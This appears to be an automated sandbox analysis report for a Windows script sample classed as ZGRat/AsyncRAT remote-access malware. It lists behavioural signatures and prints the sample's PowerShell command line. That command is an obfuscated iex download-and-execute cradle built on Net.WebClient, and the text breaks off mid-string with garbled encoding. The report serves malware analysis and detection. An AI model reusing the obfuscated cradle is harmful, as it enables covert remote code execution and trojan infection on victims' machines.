Analysis Overview
SHA256
f4accddf3bacbc70b54763800af4d7f47a427edd249ba1066ffcadb1458c03db
Threat Level: Known bad
The file f4accddf3bacbc70b54763800af4d7f47a427edd249ba1066ffcadb1458c03db (3) was found to be: Known bad.
Malicious Activity Summary
Detect ZGRat V1
ZGRat
AsyncRat
Async RAT payload
Blocklisted process makes network request
Checks computer location settings
Drops file in System32 directory
Suspicious use of SetThreadContext
Enumerates physical storage devices
Suspicious use of SetWindowsHookEx
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-01-25 11:33
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-01-25 11:33
Reported
2024-01-25 11:36
Platform
win7-20231215-en
Max time kernel
140s
Max time network
120s
Command Line
Signatures
Detect ZGRat V1
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
ZGRat
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f4accddf3bacbc70b54763800af4d7f47a427edd249ba1066ffcadb1458c03db (3).wsf"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex('(&aUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥y(aUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥yGaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥yCaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥yM 
*aUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥yWaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥y-aUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥yOaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥y*aUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥y)NaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥yeaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï
¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥ytaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥y.aUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥yWaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥yeaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥ybaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥yCaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥ylaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼
©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥yiaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥yeaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥ynaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥ytaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥y).DaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥yoaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPO
Nï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥ywaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥ynaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥ylaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥yoaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§